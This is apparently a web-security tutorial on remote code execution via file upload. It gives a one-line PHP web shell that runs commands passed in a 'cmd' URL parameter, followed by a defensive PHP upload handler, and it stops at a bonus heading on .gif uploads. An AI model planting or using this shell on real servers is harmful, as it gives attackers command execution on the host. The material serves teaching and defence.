RCE Via File Upload

One of the most interesting attacks that comes to mind whenever there is file upload functionality is Remote Code Execution. There are several ways to achieve code execution with malicious files; one of the most common is to upload a shell and gain further access.

PHP Shell For RCE:

Try uploading this code with a .php extension, then try to locate and retrieve the PHP file from the application. In the file URL you can add a 'cmd' parameter, where you can enter commands like 'whoami'.
For example: https://example.com/shell.php?cmd=whoami

 <?php phpinfo(); ?>
 <?php system($_GET['cmd']); ?>

It will not be this simple in a real-world application: there will be some restrictions on uploading these PHP files. We will talk about file upload bypass techniques below.
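
The restrictions mentioned above, seen from the server side, as an added example that is not part of the original post: an upload handler that keeps an uploaded file from ever being executed. The form field name "file" and the storage path /var/app/uploads are assumptions.

```php
<?php
// Added example, not from the original post. Assumed names: form field "file",
// storage directory /var/app/uploads located outside the web root.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';   // assumption: not reachable by any URL
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = [                      // detected MIME type => extension we assign
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Type comes from the file content, never from the client's name or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // Server-generated name: "shell.php" or "x.php.gif" never reaches the disk,
    // so a valid image that also contains PHP is stored as inert data.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $name;   // opaque id; serve through a script that sets Content-Type itself
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    try {
        $id = store_upload($_FILES['file'] ?? []);
        echo json_encode(['id' => $id]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Content sniffing alone does not make a file safe, since an image can carry PHP in its body; what removes the execution path is the server-chosen extension together with storage outside the document root.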


[Bonus] RCE Via .gif Upload: